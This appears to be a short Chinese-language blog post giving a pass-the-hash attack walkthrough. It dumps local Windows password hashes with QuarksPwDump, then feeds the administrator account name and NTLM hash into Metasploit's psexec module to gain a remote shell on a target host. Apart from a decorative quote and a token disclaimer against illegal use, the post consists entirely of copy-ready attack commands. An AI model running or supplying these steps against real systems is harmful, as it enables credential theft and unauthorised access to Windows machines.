我能想通,也能接受,但是,我很難過。。。
—- 網易雲熱評
一、利用QuarksPwDump獲取hash值
quarkspwdump –dump-hash-local –output 1.txt

二、利用msf遠程登錄
1、選擇攻擊模塊
use exploit/windows/smb/psexec
2、設置相關參數
set rhosts 192.168.139.129
set smbuser administrator
set smbpass AAD3B435B51404EEAAD3B435B51404EE:AE15921C10DC81E86C2BFFED52D24A8F
3、run,運行

4、獲取shell,如果有亂碼使用chcp 65001解決

禁止非法,後果自負
原創文章,作者:投稿專員,如若轉載,請註明出處:https://www.506064.com/zh-hant/n/212359.html